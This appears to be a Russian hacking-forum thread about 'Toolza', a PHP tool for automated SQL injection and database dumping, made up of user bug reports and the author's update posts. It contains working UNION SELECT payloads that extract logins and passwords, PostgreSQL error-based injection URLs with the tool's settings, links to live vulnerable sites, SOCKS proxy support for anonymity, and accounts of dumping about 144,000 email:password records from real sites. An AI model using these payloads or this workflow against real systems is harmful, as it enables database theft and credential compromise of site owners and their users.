Toolza 1.0

Discussion in 'PHP' started by Pashkela, 17 Oct 2009.

  1. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    я имел ввиду эту фукцию добавить и будеть полезно для брута столбцов
     
  2. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    еще на mysql 5 когда сливает данные с information_schema не показывается другие бд. А на других прогах определяется все бд например:
    тут тока один и всё. Сможеш сделать так?
     
  3. axe89

    axe89 Banned

    Joined:
    18 Aug 2008
    Messages:
    135
    Likes Received:
    46
    Reputations:
    -6
    ((

    Неработает!!!
    Обьесните мне, значит вот что у меня не выводит юзеров значит проблема вот в чём я знаю что юзеров 26 но у меня почему-то тулза выводит только 15, я переберал в ручную вот пример
    (union+select+1,2,3,password,5,6,7,8,login+from+clients+limit+1,1 union+select+1,2,3,password,5,6,7,8,login+from+clients+limit+2,1 union+select+1,2,3,password,5,6,7,8,login+from+clients+limit+3,1 ну и.т.д но потом у меня лимит меняеться на union+select+1,2,3,password,5,6,7,8,login+from+clients+limit+15,2 union+select+1,2,3,password,5,6,7,8,login+from+clients+limit+16,2 union+select+1,2,3,password,5,6,7,8,login+from+clients+limit+17,2 ну и,т,д) вот и она невыводит дальше после 15 юзеров потому что лимит меняеться на limit+15,2 подскажите как решить эту проблему!!

    связь:359-860-516
     
  4. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    никто не обижает, я просто тестируб прогу и хочу чтоб работал лучше и говорю про нужных возможных дополнениях

    ace89
    про лимит уже написали что и как в предыдущих постах, прочитай их
     
    #164 YuNi|[c, 24 Nov 2009
    Last edited: 24 Nov 2009
  5. axe89

    axe89 Banned

    Joined:
    18 Aug 2008
    Messages:
    135
    Likes Received:
    46
    Reputations:
    -6
    Млин стукните кто нить в icq
     
  6. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    update:

    PostgreSQL injection:

    1. UNION+SELECT method:

    - Многопоточный
    - Post/Get/Cookies/Proxy & etc.
    - Возможность задавать в настройках data type принтабельного поля ("text" - default)
    - Авто CHR(data)||
    - Остальное все тоже самое, что и в mysql

    2. SUBQUERY method:

    - Многопоточный
    - Post/Get/Cookies/Proxy & etc.
    - Возможность задавать в настройках тип конвертации данных для вызова ошибки
    - Авто CHR(data)||
    - Остальное все тоже самое, что и в mysql

    Пример метода UNION+SELECT:
    Code:
    http://site.com/index.phtml?pid=7+union+select+null,version(),null--
    
    Настройки в скрипте:
    
    $p_union_select_url = "http://site.com/index.phtml?pid=7+union+select+null,^,null"; # url UNION+SELECT method
    $p_subquery_url = ""; # url SUBQUERY method
    $p_method = 0; # 0 - UNION+SELECT method, 1 - SUBQUERY method
    $p_filtr = "--"; # close SQL
    $p_plus = "+"; # %20,%2b & etc.
    $p_convert = "text"; # convert data type(text,int ... etc.)
    
    Пример метода SUBQUERY:

    Code:
    http://site.com/index.php?id=1+and+1=cast(select+version()+as+int)
    
    или 
    
    http://site.com/index.php?id=1+and+1=version()::int
    
    что тоже самое
    
    Настройки в скрипте:
    
    $p_union_select_url = ""; # url UNION+SELECT method
    $p_subquery_url = "http://site.com/index.php?id=1+and+1="; # url SUBQUERY method
    $p_method = 1; # 0 - UNION+SELECT method, 1 - SUBQUERY method
    $p_filtr = ""; # close SQL
    $p_plus = "+"; # %20,%2b & etc.
    $p_convert = "int"; # convert data type(text,int ... etc.)
    
    PS: Examples - можете потестить на свой страх и риск:

    1. UNION+SELECT метод:

    https://forum.antichat.ru/showpost.php?p=1308855&postcount=9661

    POST-method granted

    2. SUBQUERY метод:

    https://forum.antichat.ru/showpost.php?p=1704231&postcount=11320

    POST-method granted
     
    #166 Pashkela, 24 Nov 2009
    Last edited: 24 Nov 2009
  7. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    Pashkela может алгоритм посмотриш с Silvia sql насчет инъекции access&jet db.
     
  8. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    а что не так с access? Ты опять про подбор кол-ва колонок?

    посмотрел сильвию - аналогичный метод подбора, также слева пляшет и в один поток, пока не встретит "The Microsoft Jet database engine does not recognize", у меня просто код вручную можно вводить (для универсальности, а то изменят надпись и что, гуляй Василий?) - "80004005". А смысл по большому счету тот же

    Ну если тебе так нравиться, впиши вместо 80004005 "The Microsoft Jet database engine does not recognize" - будет тоже самое

    PS: Какой там нафиг алгоритм, у сильвии даже "+" жестко вписан в код, не говоря уже об возможных close sql. На уровне "прокатит/не прокатит"
     
    #168 Pashkela, 25 Nov 2009
    Last edited: 25 Nov 2009
  9. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    update:

    Кстати все равно спасибо, что напомнил - оптимизировал (убыстрил) алгоритм подбора колонок в access - теперь узнается практически моментально. Обновления в первом посте.


    update:

    небольшая общая отпимизация/универсализация кода для различных ситуаций
     
    #169 Pashkela, 25 Nov 2009
    Last edited: 26 Nov 2009
  10. axe89

    axe89 Banned

    Joined:
    18 Aug 2008
    Messages:
    135
    Likes Received:
    46
    Reputations:
    -6
    Неработает!!!
    Обьесните мне, значит вот что у меня не выводит юзеров значит проблема вот в чём я знаю что юзеров 26 но у меня почему-то тулза выводит только 15, я переберал в ручную вот пример
    (union+select+1,2,3,password,5,6,7,8,login+from+cl ients+limit+1,1 union+select+1,2,3,password,5,6,7,8,login+from+cli ents+limit+2,1 union+select+1,2,3,password,5,6,7,8,login+from+cli ents+limit+3,1 ну и.т.д но потом у меня лимит меняеться на union+select+1,2,3,password,5,6,7,8,login+from+cli ents+limit+15,2 union+select+1,2,3,password,5,6,7,8,login+from+cli ents+limit+16,2 union+select+1,2,3,password,5,6,7,8,login+from+cli ents+limit+17,2 ну и,т,д) вот и она невыводит дальше после 15 юзеров потому что лимит меняеться на limit+15,2 подскажите как решить эту проблему!!

    связь:359-860-516
     
  11. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Дорогой axe89, в теме по твоему вопросу уже было написано, что тулза поддерживает только (исключительно) формат перебора limit+n,1 - где n - меняющееся значение, формат limit+n,n не поддерживается, к сожалению, ибо нафиг никому не нужен, как правило

    Т.е. ответ на твой вопрос только один - никак, и, хотя может быть, но таки врядли ты найдешь что-то в сети, что умеет это делать

    PS: Совет - если у тебя постоянно такие вот нестандартные скули - возьми и напиши свой скрипт для такого типа дампа, или попроси кого-нибудь.
     
    #171 Pashkela, 26 Nov 2009
    Last edited: 26 Nov 2009
  12. axe89

    axe89 Banned

    Joined:
    18 Aug 2008
    Messages:
    135
    Likes Received:
    46
    Reputations:
    -6
    Ну так зделайте
     
  13. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Подумаю
     
  14. axe89

    axe89 Banned

    Joined:
    18 Aug 2008
    Messages:
    135
    Likes Received:
    46
    Reputations:
    -6
    или посоветуй как слить базу без limit+1,1 limit+2,2 и,т,д
     
  15. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    https://forum.antichat.ru/thread118842-group_concat.html

    PS: В конце концов и то, что тебе нужно, уже заложено в тулзе, укажи условие where id>чего-то, и будет тебе счастье
     
    #175 Pashkela, 26 Nov 2009
    Last edited: 26 Nov 2009
    1 person likes this.
  16. svesve

    svesve Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    574
    Likes Received:
    86
    Reputations:
    11
    Столкнулся вепрвые с name_const
    навели меня на эту утилитку + заодно увидел и другую утилиту sql... как-то там

    По мне лично,как новичку, удобнее пользоваться Toolza как говориться есть какой никакой интерактив, т.е. выбрал,выбрал...и пошел...

    Скорость....что касается скорости я особо не запариваюсь, для меня важен результат, результат был получен, спасибо Pashkela.

    ИМХО утилита - проста, разнообразна по функционалу, удобна "как для новичка".
    Спорить об алгоритмах, быстродействиях не могу ввиду своих малых познаниях в SQL
     
  17. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    update:

    - Для всех режимов работы - поддержка SOCKS4-5 (файл socks.txt) - авточекинг, автоопределение типа носка(4-5), без авторизации, работает с первым рабочим

    видео - режим SOCKS mode

    отдельное спасибо опять же krypt3r за разъяснение работы с соксами

    Обновления в первом посте темы
     
    #177 Pashkela, 29 Nov 2009
    Last edited: 14 Dec 2009
    3 people like this.
  18. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    Если есть возможность можно сделать настройку отправки запросов через http header:referref, client-ip, x-forwarded-for и тд. Если на MSSQL есть скул на HTTP Header то на mssql нету такого проги для инъекции черех хедер
     
  19. colorist

    colorist Member

    Joined:
    22 Jun 2009
    Messages:
    0
    Likes Received:
    12
    Reputations:
    15
    Хорошая прога, но возникли трудности с дампом mysql 5, 144 000 записи, на экране все отображается нормально, а в текстовом файлике иногда записывает мыло не полностью например .ru:pass или @mail.ru:pass, иногда вобще пустая строка, выход нашел тянуть по 1500 но блин так замахатся можно, может есть какой нибудь другой выход?
     
  20. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Честно говоря не вы первый, кто говорит, но сам ни разу не сталкивался, тягал по 20 000 и больше зараз. Перепроверю...попозже.

    Если происходит обрыв связи (интернет) или с сайтом (скорее всего сайт после такого дампа становится недоступен и через браузер) - да, не запишется, пока не заберет заявленное кол-во. При плохом коннекте выход только один - дампить частями.

    PS: Рекомендуемое кол-во потоков - 10, если такое происходит при 10, то еще уменьшить кол-во потоков, при плохом коннекте это имеет значение для качества дампа.

    Плюс если работаете через прокси/соксы - имеет значение качество коннекта через них
     
    #180 Pashkela, 2 Jan 2010
    Last edited: 3 Jan 2010